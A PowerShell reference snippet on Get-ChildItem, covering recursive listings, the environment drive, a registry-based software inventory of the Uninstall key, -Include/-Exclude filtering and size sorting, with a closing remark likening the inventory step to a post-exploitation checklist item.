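The article's command lines are not reproduced on this page, so the forms it walks through are collected here as an added example (not the article's own code). C:\Scripts and the Uninstall key are the article's examples and must exist on your machine. The pipeline into Get-ItemProperty and the note on when -Include actually applies go beyond the article.

```powershell
# 1. The current location, then everything beneath it
Get-ChildItem
Get-ChildItem -Recurse

# 2. Other providers: the environment "drive" and a registry key's subkeys
Get-ChildItem -Path Env:
Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'

# Get-ChildItem lists subkeys only; the values inside each subkey need Get-ItemProperty.
# Piping the subkeys through it turns the Uninstall key into a software inventory.
Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' |
    Get-ItemProperty |
    Where-Object DisplayName |
    Select-Object DisplayName, DisplayVersion, Publisher, InstallLocation |
    Sort-Object DisplayName

# 3. -Include / -Exclude. -Include is matched against the leaf of the path, so it only does
#    something when the path carries a wildcard (the article's C:\Scripts\*.*) or -Recurse is given;
#    Get-ChildItem -Path C:\Scripts -Include *.txt returns the folder contents unfiltered.
Get-ChildItem -Path 'C:\Scripts\*.*' -Include *.txt, *.log
Get-ChildItem -Path 'C:\Scripts\*.*' -Exclude *.txt, *.log

# 4. Sorting by a property other than Name; -File (PowerShell 3.0+) keeps folders, which have no
#    Length, out of a size-ordered listing
Get-ChildItem -Path 'C:\Scripts' -File | Sort-Object Length
Get-ChildItem -Path 'C:\Scripts' -File | Sort-Object Length -Descending
```

The registry pipeline is the same inventory step a post-exploitation checklist calls "Software": one pass over the Uninstall key, no WMI query and no installer interaction.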